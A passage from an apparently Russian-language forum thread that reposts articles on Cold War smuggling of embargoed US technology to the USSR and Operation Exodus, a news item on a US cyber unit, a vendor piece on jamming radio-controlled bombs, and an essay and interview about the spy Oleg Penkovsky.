либеральными правилами вывоза, а также Канада, поскольку экспорт американской продукции в эту соседнюю страну не нуждается в разрешении. Ассортимент контрабанды охватывал весьма широкий круг товаров - от высокочувствительных микроволновых подслушивающих устройств до высококачественных конторских компьютеров, использовавшихся также для расчета ракетных траекторий. Получателем обычно являлась одна из многих псевдофирм Бруххаузена в ФРГ, которые, как, фирмы, управляемые Тони Малутой, тоже Е большинстве случаев состояли из одного адреса. Однако фирмы никогда открыто не выступали в качестве поставщиков современных технологий. Ларчик открывался так. К примеру, дюссельдорфская фирма, располагающаяся по адресу Гетештрассе, 11, продает оборудование фирме в баварском местечке Нидерзеен близ Траунштайна. Последняя, находясь рядом с границей, перевозит полученный товар в соседнюю Австрию. Здесь проживает владелец предприятия и одновременно компаньон Бруххаузена Дитмар Ульрихсхофер собственник многих предприятий по обе стороны австро-германской границы Ульрихсхофер в свою очередь продает оборудование своей венской фирме "Электроник". Далее оно переправляется из Вены, порой через Цюрих, в одну из стран Восточного блока. Контрабандная поставка высокотехнологических изделий из Калифорнии через ФРГ беспрепятственно работала Добрых пять лет, и ответственные инстанции в Вашингтоне ничего не ведали об этом. Однако в 1980 г., к ужасу спекулянтов высокотехнологической продукции, началась операция "Экзодус", которая должна была поставить заслон нелегальной торговле между Западом и Востоком. В операции участвовали спецподразделения американских таможенных экспертов в тесном сотрудничестве с ЦРУ, ФБР, другими западными спецслужбами и европейскими таможенными ведомствами. Уже в первые годы деятельности спецподразделение США своевременно перехватило более 2300 фрахтовых грузов с ценными стратегическими товарами, предназначенными для Востока, а за шесть лет после начала операции "Экзодус" было предотвращено около 11 500 поставок запрещенных к вывозу изделий на общую сумму примерно 900 млн долларов. Самый нашумевший в ходе операции случай был связан с американской фирмой "Гэзоник KV Весной 1980 г. прокурор Теодор By, руководитель следственного контрольно-экспертного отдела министерства торговли США, решил расставить ловушку вернеру Юргену Бруххаузену. Прокурор By узнал, что Тони Малута получил от Бруххаузена задание заказать у "Гэзоник компани оф Калифорниа" две окислительных системы высокого давления, необходимые для изготовления современнейших микропроцессоров. Эти аппараты подпадали под абсолютный экспортный запрет. Для их вывоза в ФРГ строго обязательно требовалась экспортная лицензия, при этом не исключался отрицательный ответ министерства торговли, лаже если речь шла о союзнике США по НАТО. Когда фирмы-изготовители интересовались, для каких целей будет использоваться закупленное у них оборудование, у Тони Малуты был готов "солидный" ответ: оно де предназначено для секретного объекта армии США в Форт-ватуге, штат Аризона. После этого у крупных фирм, кичащихся своим американским патриотизмом, не возникало дальнейших вопросов. В таможенной декларации Малута обозначил окислители высокого давления как банальные печи. Стоимость аппаратуры, за которую было уплачено 250 тыс. долларов, декларировалась всего в 2500 долларов, а конечным адресатом поставки была указана ФРГ. Из Лос-Анджелеса груз благополучно пропутешествовал на самолете "Люфт-ганзы" в Мюнхен. Там его принял австрийский инженер Дитмар Ульрихсхо-фер, которому товар обошелся уже в 400 тыс. долларов... так что Малута положил в карман 150 тыс. долларов. Ульрихсхофер перевозит аппаратуру на свою немецкую фирму в Бад-Райхенхолле, откуда он продает ее своей же австрийской фирме в Вене. В декларации для таможенного оформления груза при пересечении границы по автостраде близ Зальцбурга Ульрихсхофер указал, что ввозимая аппаратура не будет снова реэкспортирована из Австрии, хотя у него в кармане уже лежит договор на немецком и русском языках, предусматривающий поставку аппаратуры "Гэзоника" в Москву. При поступлении оборудования там ему были обязаны выплатить за него 764 525 долларов, то есть в три раза выше первоначальной цены. Таким образом, около 500 тыс. долларов составляли прибыли Малуты, Бруххаузсна и Ульрихсхофера. Доставленный в Австрию груз оказывался вне сферы влияния НАТО. В Вене Ульрихсхофер должен был передать товар от "Гэзоника" в новый фрахт, декларировав его на этот раз как обыкновенные машины. Рейсом КЛМ 940 они должны быть сначала доставлены в Амстердам, а оттуда рейсом 702 "Аэрофлота" - в Москву. Вечером 3 июня 1980г. Ульрихсхофер зашел на склад экспортных грузов, намереваясь добавить к отправляемой аппаратуре оригинальные характеристики и предписания по эксплуатации американской электроники. Но, вскрыв ящик, он, к своему удивлению, обнаружил вместо изделий "Гэзоника"... обыкновенный песок из Калифорнии. Однако не Малута продал австрийцу самый дорогой в мире ящик песка.
А дело объяснялось просто. В ходе этой операции оборудование "Гэзоника" и не покидало Лос-Анджелес. По указанию прокурора By американские таможенники вскрыли подозрительный груз. А когда увидели, что вместо заявленных в декларации печей упакованы подлежащие эмбарго микроэлектронные устройства "Гэзоника", то заменили содержимое ящика песком. Благодаря этой акции прокурору By удалось накрыть контрабандистскую сеть Бруххаузена. Во всех фирмах Тони Малуты, принадлежащих в действительности Бруххаузену, были проведены обыски Одновременно немецкие следователи в тесном сотрудничестве с американскими чинами службы безопасности сделали то же самое в подставных фирмах Бруххаузена в Дюссельдорфе, Бонне и Мюнхене. Конфискованные документы раскрыли огромные размеры контрабанды технологических секретов НАТО в Советский Союз. Представители американских служб безопасности затруднились определить ущерб, нанесенный этой троицей Западу. А американский эксперт по компьютерам доктор Лара Бейкер заявила с телеэкрана: "С помощью Бруххаузена и его сети Советскому Союзу удалось получить весь необходимый материал и все запчасти для строительства современного завода по производству микропроцессоров и промышленном объеме. Эти микросхемы являются основой для всех военных вооруженческих систем, Например, микропроцессорных сигнализаторов радаров, с помощью которых можно обнаруживать и сбивать крылатые ракеты. Во многих случаях Бруххаузен поставлял приборы наведения и связи, которые были сконструированы, построены и пущены в ход по военным спецификациям", В СССР понимали подлинную ценность контрабандных поставок и не останавливались перед расходами. Инженер Бруххаузен заработал на торговле запрещенными к вывозу технологиями до 40 млн марок, причем часто минуя налогообложение, поскольку многое между ним и Москвой обговаривалось негласно и оплата производилась на тайные счета в швейцарских банках. Через несколько дней после спецакции, проведенной в рамках операции "Экзодус", в калифорнийском городе ПалмДизерте были арестованы Тони Малута и его подруга Сабина Титтель. По обвинению в нарушении законов США об экспорте, подрыве национальной безопасности и многих налоговых проступках Тони был приговорен к 5 годам заключения. Его подруга была приговорена к 2 годам и штрафу в 25 тыс. долларов, Как выяснилось в коде следствия, фирмы Малуты никогда не запрашивали разрешений на вывоз, а обозначали технологически ценную аппаратуру названиями обычных безобидных товаров не требующих лицензий на вывоз. Так, на ящиках с комплектующими для компьютеров могло значиться "стиральная машина", "кухонная печь", а то и просто "техприбор". По федеральным и австрийским законам нелегальный импорт высоких технологий из США не является преступлением. Поэтому международные "шлюзо-вики" технологий Бруххаузен и Ульрихсхофер не подлежали выдаче Соединенным Штатам и могли действовать безнаказанно. Несмотря на то что в ФРГ про-тив Бруххаузена были выдвинуты обвинения в контрабандных сделках, сокрытии налогов и нарушении закона о внешней торговле, прокуратура сочла возможным освободить его под залог 100 тыс. марок. Но всетаки неудача подкараулила Бруххаузена. Однажды он прибыл из Мюнхена в Англию по фальшивому бразильскому паспорту, уверенный в том, что под новым именем он сможет уйти от американских сыщиков. Но 7 мая 1985 г. его арестовали в фешенебельном лондонском отеле и поместили в следственную тюрьму. 14 месяцев он пробыл там, не оставляя надежды, что его не выдадут Соединенным Штатам. Но в 1986 г. это случилось: его в наручниках посадили в самолет и доставили в США, Процесс против Верыера Ю Бруххаузена закончился в мае 1987 г. Суд в Лос-Анджелесе приговорил его к 15 годам тюрьмы и штрафу в 15 тыс. долларов. Суд счел доказанным, что в 1976-1980 гг. он закупал в США новейшую высокотехнологичную продукцию и через сеть подставных фирм переправлял ее тайно в Советский Союз. Другому "технобандиту", как его охарактеризовало ЦРУ, везло больше. Это германский мультимиллионер Рихард Мюллер из Естебурга, который был ведущей фигурой на международном рынке нелегальных поставок технологии с Запада на Восток, Десять лет продолжалась его "деятельность", Советский Союз "перекачал" в него сотни тысяч марок. Но и для него все кончилось, когда в ноябре 1983г. таможенники Гамбургекого порта задержали перед отплытием фрахтер "МС Эльгарен" и обнаружили на борту три комплектных компьютера "VAX-11 -780" американской фирмы "Диджитал эквипмент К", попавших на Эльбу через Южную Африку. Эти компьютеры "VAX" значатся в числе первых в запретном списке парижского КОКОМ. Ко всему прочему, они пригодны для системы боевого наведения атомных ракет. Участники операции "Экзодус" позаботились о скорейшем возвращении контрабандных компьютеров в США, а министр обороны США Уайнбергер поблагодарил на пресс-конференции федеральное правительство за то" что оно "спасло НАТО от огромного ущерба". Сам же Мюллер, берлинец со швейцарским паспортом, сразу сбежал в Восточный Берлин, бросив свой концерн-фантом, Там следы "технобандита" затерялись. Мюллер умудрился продать советской военной промышленности из компьютерного эльдорадо Силикон-Вэлли (Калифорния) комплектное производственное оборудование для полупроводниковых элементов и базовых частей электронных процессоров. Однако масса других фирм электронной отрасли ФРГ продолжала бойкую торговлю с Восточным блоком, ибо в технологической области экспорт компьютеров является колоссально прибыльным. А КГБ между тем сумел найти менее хлопотные пути для нелегальной переброски технологий из Федеративной Республики Германии через внутригерманскую границу в Советский Союз. Это обнаружилось в январе 1987г. на заседании 3-й уголовной палаты земельного суда в Целле при открытии процесса против двух немецких торговцев электроникой. Как доложил старший прокурор Ванбек, с некоторых пор советская сторона приняла меры к тому, чтобы торговцы доставляли им новейшие технологические изделия, прежде всего запрещенные к экспорту товары из США, грузовиками, так сказать, прямо "к порогу", то есть в перевалочные пункты, созданные вдоль транзитных путей между Западным Берлином и остальной федеральной территорией. Тем самым КГБ, во-первых, подвергал собственных агентов меньшей опасности провала на Западе, а, во-вторых, секретная служба одновременно экономила расходы на дорогостоящую транспортировку грузов через третьи страны в СССР.

Автор:  СПЕЦНАЗ ЛАСКИ [ 30-03, 06:44 ]
Заголовок сообщения: 

Американские хакеры переходят в наступление
1:11 pm, 19 апреля 2005 года. GMT -5

http://www.americaru.com/news/5616

В США разрабатывается сверхсекретный проект по развитию компьютерного спецподразделения, ориентированного на атаки и разрушение вражеских компьютерных сетей, сообщается на сайте Wired.com.

О необходимости создания такой группы было заявлено на заседании Сенатской комиссии по вооружениям, которое состоялось в прошлом месяце. Тогда было сказано о совершенствовании компьютерного спецподразделения, созданного на базе Пентагона, ФБР и ЦРУ.

По словам должностных лиц, осведомленных о существовании этого проекта, работа этого подразделения будет чрезвычайно секретной, а на его финансирование будут выделены миллионы долларов. Таким образом, новое компьютерное спецподразделение США станет самым оснащенным и самым засекреченным боевым отрядом для борьбы с киберпреступниками.

Автор:  Ласка [ 04-04, 05:27 ]
Заголовок сообщения: 

Проблема защиты от поражения радиоуправляемыми взрывными устройствами 14.11.2003

http://www.explosive.ru/1/1/916.html

Исхаков Б.С., Фомичев К.И., Юдин Л.М.
Проблема защиты от поражения радиоуправляемыми взрывными устройствами

В современной России жизнь видных политических деятелей и ведущих бизнесменов в силу сложной криминогенной обстановки подвергается постоянному риску.

Несмотря на то, что современные методы защиты охраняемого лица с участием телохранителей достаточно эффективны, и большинство охранных фирм, агентств и служб безопасности располагают квалифицированным персоналом, способным отразить практически любой вид "видимой" угрозы со стороны террористов, они остаются бессильны перед дистанционно управляемыми по радиолиниям взрывными устройствами. Статистика последних лет показывает, что, к сожалению, радиолинии управления взрывом (РУВ) находят все большее применение как в нашей стране, так и за рубежом.
Преимущества РУВ перед другими средствами уничтожения заключаются в том, что, во-первых, оператор-террорист, осуществляющий управление подрывом, может находиться на достаточном удалении (100 метров и более) от места закладки взрывного устройства, тем самым обеспечивая собственную безопасность и конфиденциальность. При этом отсутствует возможность определить его по каким-либо уликам, а сам командно-передающий прибор дистанционного управления может не превышать габаритов пачки сигарет.
Во-вторых, приемно-исполнительный прибор РУВ может быть выполнен в любом трудно поддающемся обнаружению камуфляже (пакет молока, обувная коробка и т.п.) или заложен в запаркованный автомобиль, уличную урну, водосточную трубу, кабину лифта и т.п., что делает практически невозможным выявление взрывного устройства методом визуального контроля.
В-третьих, поскольку в конструкции РУВ могут применяться находящиеся в открытой продаже системы дистанционного управления (например, используемые в автомобильных сигнализациях или в радиоуправляемых игрушках), радиотелефоны, сотовые телефоны и пейджеры, то даже для среднего специалиста в области радиотехники изготовление РУВ не является сколько-нибудь серьезной проблемой.
В-четвертых, эффект применения РУВ из-за своей внезапности и большой разрушительной силы всегда сопровождается деморализующим фактором, затрудняющим быстрое оказание первой медицинской помощи и способствующим беспрепятственному отходу террориста.
Фирма Radel Ltd., осознавая, каким мощным оружи-ем в руках террористов является РУВ, разработала аппаратуру "Родиола-96", которая позволяет нейтрализовать эту угрозу. Принцип действия устройства заключается в создании специального помехового сигнала, блокирующего сигнал управления приемоисполнительным прибором, который передается террористом по радиолинии с помощью командно-передающего прибора дистанционного управления. При этом команда на подрыв не доходит до электровоспламенительной цепи приемоисполнительного прибора РУВ и взрыва не происходит.
Несмотря на кажущуюся простоту, обеспечение защиты от поражения радиовзрывным устройством путем применения аппаратуры радиоэлектронного подавления является сложной научно-технической задачей. Это обусловлено тем, что в реальных условиях отсутствует какая-либо информация о параметрах РУВ, которые могут применяться террористом в данной конкретной обстановке: рабочая частота РУВ, вид модуляции сигнала управления и способ кодирования команды на подрыв. Отсутствуют сведения о типе и параметрах приемника приемоисполнительного прибора, выходной мощности передатчика командно-передающего прибора дистанционного управления и удаленности террориста от места закладки взрывного устройства.
При наличии информации об основных параметрах РУВ достижение высокой эффективности защиты охраняемого лица обеспечивалось бы применением достаточно простых технических средств. Однако значительная априорная неопределенность технических характеристик радиовзрывного устройства и его высокая боевая эффективность приводят к необходимости применения достаточно сложной аппаратуры радиоэлектронного подавления, обеспечивающей формирование специального вида комбинированных помех, оптимизированных для подавления с высокой гарантированной эффективностью различных типов РУВ в условиях отсутствия каких-либо данных о параметрах применяемого взрывного устройства.
Решение этой задачи невозможно без проведения большого объема теоретических и экспериментальных исследований и наличия высококвалифицированного коллектива разработчиков, имеющего многолетний опыт практического создания аппаратуры радиоэлектронного подавления систем радиоуправляемого оружия. Большинство фирм, предлагающих в настоящее время средства радиоэлектронного подавления РУВ, не располагают такими возможностями, а выпускаемая ими аппаратура не является профессиональной.
Примененные в ней аппаратурные решения в большинстве случаев заимствованы из связной техники и потому не отвечают требованиям по широкополосности и не обеспечивают требуемых технических параметров. Отсутствие в существующей аппаратуре оптимальных типов помех компенсируется повышением выходной мощности передатчика, приводящим к значительному увеличению массогабаритных характеристик и энергопотребления.
В результате аппаратура с такими показателями может быть размещена только в автомобиле и имеет высокую цену. Именно по этой причине, несмотря на достаточно широкую номенклатуру такой аппаратуры, большинство ее видов решает только частные задачи как по диапазону рабочих частот, так и по типам подавляемых РУВ, а заявляемые параметры зачастую носят чисто рекламный характер и не отвечают действительности.
Аппаратура "Родиола-96" является профессиональной, рассчитанной на широкий круг пользователей, и в силу этого, оптимизированной по критерию "эффективность-стоимость". Ее отличительными особенностями по сравнению с известными зарубежными и отечественными образцами аналогичного назначения являются:
- высокая гарантированная эффективность подавления РУВ, отработанная в натурных условиях;
- широкий диапазон рабочих частот и высокая выходная мощность реализованы в одном аппарате, позволяющем одновременно обеспечить подавление РУВ, выполненных на базе охранных автомобильных сигнализаций, радиоуправляемых игрушек, систем сотовой связи, радиосвязи и т.п.;
- структура помехового сигнала оптимизирована для подавления РУВ с различными видами сигналов управления и типами приемников;
- отсутствие внешних демаскирующих признаков аппаратуры (штыревых антенн и т.п.) обеспечивает скрытность ее применения;
- возможность дистанционного управления от персонального компьютера;
- наличие автоматизированной микропроцессорной системы управления и встроенного контроля;
- возможность модернизации аппаратуры путем расширения технических характеристик как по диапазону рабочих частот и выходной мощности передатчика, так и по видам и параметрам помех.

Автор:  Ласка [ 04-04, 05:41 ]
Заголовок сообщения: 

ШПИОН, КОТОРОГО НЕ БЫЛО

http://freelance4.narod.ru/pen_.htm

История несостоявшейся войны

Олег Пеньковский, полковник советской военной разведки, "англо-американский шпион". На Западе он стал человеком-легендой, героем тайных схваток "холодной войны", борцом против советского режима. А для наших людей продолжает оставаться изменником и предателем. Но кого же все-таки предал Олег Пеньковский, кому изменил и изменил ли вообще?

1962 год, октябрь. Мир на грани ядерной войны. Спровоцировал кризис Никита Сергеевич Хрущев - именно его авантюрная и необдуманная акция по размещению на Кубе советского ракетно-ядерного оружия едва не столкнула мир в пропасть. 22 октября 1962 года президент США Джон Кеннеди вводит карантин - морскую и воздушную блокаду Кубы: Америка требует удаления советских ракетно-ядерных средств с острова. Хрущев приводит советские ядерные силы в полную боевую готовность - готовность к нанесению удара по территории США...

27 октября не выдержали нервы советских зенитчиков на Кубе - ракетным залпом сбит самолет-разведчик ВВС США. Казалось, это первый залп третьей мировой... Но Кеннеди не отдал приказ. И был прав.

Почему Кеннеди не дрогнул, почему не сорвался? Он мог, если бы... твердо не знал: русские не нападут первыми - они блефуют. Да, все было блефом, мыльным пузырем - за спиной Хрущева не было той реальной военной мощи, которая могла бы заставить отступить Кеннеди. Мир был заворожен, шокирован советскими успехами, и только узкий круг руководителей США и Англии тогда, в октябре 1962-го, знал: СССР еще не способен к нанесению первого ядерного удара. И дело было не только в огромном дисбалансе сил - 17:1 в пользу США по ядерным средствам, 5000 американских ядерных зарядов против 300 советских. Нет, советские ракеты были мощны, но малоуправляемы и малонадежны - системы их наведения тогда еще были толком не отработаны. Советы в данный момент абсолютно не готовы к войне, за акцией Хрущева на Кубе нет абсолютно ничего - абсолютно никакой подготовки. На чем же базировались эти выводы администрации Кеннеди, что позволило ей действовать столь уверенно и решительно, что Хрущев впервые дрогнул и отступил? Уверенность вселила та информация, которую с апреля 1961 года передавал ценнейший и крупнейший источник информации в Москве - Алекс, он же полковник ГРУ Олег Пеньковский.

По официальным данным, его арестовали 22 октября 1962 года, в самый критический момент Карибского кризиса. Но он уже сыграл главную игру своей жизни.

Неужели один человек мог добыть и передать информацию столь глобального уровня? Да. Косвенно это признал и советский суд: там сообщалось, что с апреля 1961 по осень 1962 года полковник Пеньковский отснял и передал потенциальному противнику 110 кассет фотопленки - более 5 тысяч снимков документации, более 7,5 тысячи страниц секретнейших материалов попало в руки аналитиков Запада...

Военные эксперты НАТО, подчеркивая вклад Алекса в укрепление обороноспособности своего блока, сообщили: полученная от него информация привела к кардинальному переосмыслению всей стратегии НАТО в Европе и ее пересмотру. И практически все западные исследователи единодушно увязывают имя Пеньковского именно с ракетным кризисом вокруг Кубы в 1962 году.

А мы? Что мы знаем о Пеньковском, какой портрет нарисовала официальная пропаганда? "Лицемерие, двуличность, обман"; "Свидетели Пеньковского показали на суде, что он был близок со многими женщинами, прожигал жизнь в питейных заведениях"; "Пеньковский был человеком с крайне ограниченными интересами, с крайне узким кругозором, он не проявлял интереса ни к литературе, ни к музыке, ни к искусству. Он не читал книг". Чекистская логика вечна и неизменна: шпион должен соответствовать высочайше утвержденному клише и образу. Он обязательно должен быть бабником, развратником, пьяницей.

Но реальный Пеньковский далек от образа, карикатурно очерченного судом. Олег Владимирович родился 23 апреля 1919 года в городе Владикавказе в интеллигентной и благополучной по дореволюционным меркам семье. Его отец, Владимир Флорианович, выпускник Варшавского политехнического института, инженер по профессии, в 1918 году стал офицером белой армии. Поручик Пеньковский погиб или пропал без вести в боях против Красной Армии незадолго до рождения сына. Нам трудно подтвердить или опровергнуть этот факт. Родной дядя его отца, напротив, пошел служить к красным. В начале 60-х Валентин Антонович Пеньковский был уже генералом армии, командующим войсками Белорусского военного округа. А у Олега Пеньковского была типичная советская жизнь: школа, комсомол, артиллерийское училище в Киеве... В сентябре 1939 года политрук батареи Пеньковский участвует в боевых действиях против поляков. В январе 1940-го он уже на Карельском фронте, воюет с финнами, в марте вступает в партию. Затем война с Германией: фронт, ранения, награды. Артиллерийский офицер Пеньковский воевал очень неплохо, о чем говорят хотя бы его награды: два ордена Красного Знамени, орден Александра Невского, орден Отечественной войны I степени, орден Красной Звезды, восемь медалей...

В 1948-м он заканчивает одну военную академию, а через год его направляют уже в другую - Военно-дипломатическую - кузницу кадров советской военной разведки. В 50-м Пеньковскому присвоено звание полковника - в 31 год! В 53-м он попадает в центральный аппарат ГРУ - в управление, занимающееся странами Ближнего и Среднего Востока, 1955-й - первая командировка за рубеж в качестве помощника военного атташе в Анкаре. Но его реальная должность - старший помощник резидента ГРУ в Турции...

1958-м годом датируется его первый контакт со спецслужбами Запада. По версии западных исследователей и советских следователей, именно тогда Пеньковский и замыслил перейти на "их" сторону: он пытается заинтересовать резидентуру ЦРУ в Анкаре своей информацией об операциях советской разведки на Ближнем Востоке, о советском проникновении в Египет и Турцию. Но эксперты по контрразведке ЦРУ классифицировали тогда эту активность советского полковника как типичную операцию КГБ. ЦРУ информировало посольства стран НАТО в Анкаре об опасности контактов с этим полковником. Скорее всего, это и была одна из операций, только не КГБ, а ГРУ.

В том же году его направляют в военную академию (уже третью!) - на высшие курсы по новой ракетной технике. После окончания которых в мае 1959-го он снова возвращается в аппарат ГРУ: его направляют уже в отдел, работающий против США, Великобритании и стран Британского содружества - Канады, Австралии, Новой Зеландии...

В круг друзей и знакомых Пеньковского входят высшие армейские генералы, маршалы... Очень неплохо относится к своему подчиненному шеф ГРУ Серов, маршал Варенцов вводит Пеньковского в круг руководства ракетных войск. Такой человек действительно мог обладать доступом к уникальной информации. Но почему он решил работать на Запад, что толкнуло его на это?

Естественно, что столь рекламируемая гэбистами его страсть к женщинам, выпивке и деньгам выглядит явно неуместно. Слабо могу себе представить полковника военной разведки, бегающего по бабам и кабакам, а в перерыве шпионящего для Запада. А ведь и прямые обязанности еще были. И КГБ следил за своими "военными соседями", бдела и служба безопасности самого "Аквариума". И тем не менее Пеньковский принимает решение о сотрудничестве с английской разведкой?!

Англичане решают рискнуть и принять предложение. Они подключают к операции и американцев - слишком важными оказались данные Алекса (такой псевдоним взял себе Пеньковский) для стратегии всего западного сообщества. В иные моменты до двадцати офицеров ЦРУ обеспечивало работу Алекса в Москве. А в Лондоне и Париже с Пеньковским беседуют во время его визита буквально целыми днями: допрашивают, инструктируют, обучают приемам связи. Затем известный нам финал: арест, следствие, суд, расстрел.

Однако загадки Пеньковского здесь только начинаются. Одна из них: как он провалился и каковы обстоятельства его ареста? Вызван ли провал только работой контрразведки или его спровоцировал некий источник в Лондоне или Вашингтоне? Почему Пеньковского просто арестовали, а не взяли с поличным - на контакте, при пересъемке, закладке тайника и т.п.? Почему его связник Винн арестован не в Москве, а в Будапеште - 2 ноября 1962 года, тоже не "на деле", не с поличным взят, а на улице? Почему Пеньковский вообще пошел на поддержание связи через Винна, который был хорошо известен советским спецслужбам (в т.ч. и Пеньковскому) как экс-разведчик? Почему Пеньковский продолжал наращивать интенсивность работы тогда, когда уже все говорило о предстоящем провале: в 1962-м КГБ трижды отказало ему в выездных визах - в США, Бразилию и на Кипр. Разведчик в таких случаях должен рвать все концы, обрубать контакты, давать сигнал провала и "ложиться на дно". Почему именно КГБ берет в свои руки это дело? (ГРУ имеет свою систему внутренней безопасности и следствие по сотрудникам проводит само.) Почему вообще сообщили об этом деле, а не повели скрытую игру по дезинформации противника - обычный прием всех разведок? Ведь огласка внутри страны задевала целый эшелон высших командиров армии...

А может быть, именно поэтому оно и прогремело? Как удар по некоторым военным, удар по конкурентам из военной разведки... Может быть, это вообще была не столько контрразведывательная акция, сколько политическая, направленная на достижение неких целей в кремлевских интригах? Некоторые детали ведь вообще нелепы. Например, суду предъявлялся снимок Пеньковского в форме британского полковника - ему, мол, обещали чин полковника армии Британской империи... И профессионал Пеньковский снялся в этой форме?! И привез снимок в Москву?! Хранил дома?! Нонсенс!

А с Винном Пеньковский где встречается и беседует? В отеле "Националь"! Стоит ли объяснять, что "Националь" был чуть ли не штаб-квартирой КГБ, а его номера для таких, как Винн, были набиты аппаратурой. И стоит ли говорить, что полковник советской военной разведки это знал лучше всех.

Но если его вполне устраивали встречи именно в этой вотчине Лубянки, значит, у него были на то свои резоны. Какие? Профессиональные, вероятно.

Все это наводит на мысль: контакты Пеньковского с англичанами и американцами проходят с ведома и санкции его руководства. Это игра, которую ведет ГРУ с ЦРУ и СИС через своего полковника. Тогда можно объяснить очень многое, почти все. Почему же суд? Приговор? Разведчик, ведущий такую игру даже с санкции руководства, всегда ходит по лезвию ножа, он всегда может стать жертвой таких обстоятельств, которые ведут к срыву в пропасть. Игра может зайти далеко настолько, что даже собственное руководство заподозрит измену и примет меры для подстраховки. А если игру засекают "соседи" из КГБ? Тогда они совсем не обязаны подыгрывать своим конкурентам и фактическим противникам на политических подмостках Кремля. Ведь это великолепная возможность сыграть свою партию, поставив дело так, что ГРУ предпочтет бросить своего человека, предав его, отречься, нежели поставить под удар людей высшего ряда. И предают, и отрекаются - это в традициях наших спецслужб.

Были люди, которые немало могли выиграть от того, что Хрущев потерпел бы сильную неудачу на международной арене и был бы дискредитирован. И в первую очередь - все руководство Вооруженных Сил СССР, не говоря уж о складывающейся антихрущевской оппозиции в ЦК КПСС. Ведь к концу правления Хрущева положение дел в армии было весьма плачевным. Осенью 1957 года Хрущев выбрасывает из армии Жукова - грязно, по-заговорщически. Вместе с ним вышвырнута целая группа генералов. Им дали понять: так может быть с каждым! Впав в эйфорию от успехов советских ракетчиков, Хрущев настолько переоценил роль ракетного оружия, что приступил к реорганизации и ломке сложившейся структуры армии. Удар наносился по ВВС, флоту и артиллерии. Озлобленная, деморализованная армия была не способна к реальной схватке с таким противником, как США. И лучше всех это понимали военные "верхи" - Генштаб, ГРУ. В случае конфликта с Америкой и ее союзниками - хоть на Кубе, хоть в Европе, хоть на Дальнем Востоке - на победу рассчитывать мог только кретин. И понимающие это совсем не жаждали ввязаться в драку.

Апокалипсиса не произошло. И ключевую роль в этом сыграл Пеньковский и переданные им материалы. Они позволили Кеннеди разгадать игру Хрущева, понять ее абсурд. И если военной верхушке СССР нужно было найти такой ход, который позволил бы выйти на контакт с Америкой, дать ей понять, что Советский Союз не желает войны и не готов к ней, то лучшего инструмента, чем ГРУ, у нее не было. И лучшего канала, чем Алекс. Это лишь версия.

А если вернуться к реальному Пеньковскому, то он не мог выжить в любом случае - слишком много знал.

Владимир Семичастный:
ПЕНЬКОВСКОГО ПОДВЕЛА ЖАДНОСТЬ
Cправка из Советского энциклопедического словаря: «Семичастный Владимир Ефимович (р. 1924). Советский государственный, партийный деятель. партийный функционер КПСС с 1944 года. В 1946 -- 50 гг. секретарь, первый секретарь ЦК ЛКСМ Украины. В 1958 -- 59 гг. первый секретарь ЦК ВЛКСМ. В 1961 -- 67 гг. председатель Комитета государственной безопасности»

-- Владимир Ефимович! Не знаю, с чем уж это связано, но вдруг и на Западе и у нас вновь заговорили и заспорили о Пеньковском. Появилось много публикаций и книг. Например, за границей выпустили «Записки Пеньковского», а у нас -- мемуары «Операция «Турнир», точнее «записки чернорабочего разведки» Анатолия Максимова. Описывая «рассекреченные жизни», разные авторы совершенно по-разному рисуют судьбу и личность Пеньковского. По одним данным, это самый главный предатель военных тайн Советского Союза, получивший по заслугам высшую меру наказания. По другим данным, Олег Пеньковский -- жив, потому что, будучи искусным разведчиком, специально выполнял роль дезинформатора спецслужб Англии и Америки и добился в этом колоссальнейших успехов. Но для виду, т.е. для продолжения «игры», КГБ был разыгран спектакль суда со смертной казнью, будто бы тут же приведенной в исполнение. В действительности же его лицо было якобы ненастоящим, и после завершения спецзадания он вернулся к прежнему своему облику. И, дескать, по-прежнему здравствует как один из самых заслуженных разведчиков страны. Иные же договариваются до того, что Пеньковский не просто шпион, а такой особый шпион, что его даже сожгли, чтобы и духу его на земле не было. Уже не поймешь, что быль, а где сказка. Все это случилось при вас. Интересно, а что вы скажете?

-- Да... Что касается Пеньковского, то чего только не наговорили. Некоторые выдают его чуть ли не за резидента и координатора всей агентурной сети Запада в СССР. А на самом деле... хотите, я вам расскажу, как все было, когда его только арестовали? Он, как известно, работал в ГРУ (Главном разведывательном управлении Министерства обороны СССР), на чем и погорел тогдашний начальник ГРУ Серов...

Когда Пеньковского арестовали, его сразу привели ко мне на Лубянку...


-- Вы его допрашивали?

-- Нет. Я его не допрашивал. Я просто первый, кто хотел посмотреть на него, чтобы лично убедиться, что он за человек. Его привели ко мне в кабинет, а там, значит, такой большой стол, длинный. И вот, как сейчас помню, сидит он в конце, такой пришибленный и облезлый такой, как, понимаете, жалкий мышонок. И вдруг говорит мне: «Я, гражданин председатель... Я мог бы предложить вам свои услуги и поработать на государство...» -- то есть сразу начинает пытаться договариваться. Тогда я говорю: «Вначале скажите, какой вы вред принесли государству? И что особо важное вы передали американцам и англичанам?» Он начал что-то болтать, и тогда я сказал: «Имейте в виду, мы больше знаем, чем вы сейчас рассказываете. Поэтому посидите в тюрьме и, когда в камере все вспомните и придете к мнению, что все можете рассказать, дайте знать, и я вас приму». Однако больше я его не принимал, потому что им уже занялись следователи, арестовали уже и Винна и начали «игру» с ними: и однажды, как бы случайно, навстречу Винну повели по коридору Пеньковского, чтобы тот видел, что арестован этот, а этот видел, что арестован тот, и чтобы оба знали, что и тот и другой уже дают показания, но не знали, какие именно. Благодаря такой психологической игре на допросе их было легче раскалывать. Так что никуда он не делся. Его расстреляли.

-- А какие последствия были для его семьи? Запрещалось где-то жить, учиться и т.д.?

-- Нет. Наоборот. Ведь мы проникли в его квартиру еще раньше и в квартире обнаружили тайник, обнаружили поддельный паспорт, то есть паспорт, по которому он должен был перейти на нелегальное положение... И еще несколько тысяч рублей. Позже я приказал оставить семье не то половину, не то какую-то очень большую сумму из тех денег. Наблюдая за Пеньковским, мы параллельно убедились, что остальные члены семьи (его мать, жена и дочь) порядочные люди, которые совершенно не в курсе этого предательства (Пеньковский делал все очень тайно.) Поэтому, чтобы они не страдали, мы немедленно перевели дочь в другую школу и переселили семью в другое место. Мы боялись за дочь, потому что она уже оканчивала школу. И из-за соответствующей обстановки в школе могли быть самые страшные последствия: девочка могла психологически не выдержать возникшего напряжения и внезапной отчужденности. Однако фамилию оставили прежнюю. Потом уже, кажется, и фамилию заменили, чтобы не висело над ними проклятие сына, мужа и отца-предателя. А женой Пеньковского, кстати, была дочь не кого-нибудь, а начальника политуправления Московского военного округа. Вот так! А сам Пеньковский был адъютантом у маршала артиллерии Варенцева, который перед арестом своего «помощника» был 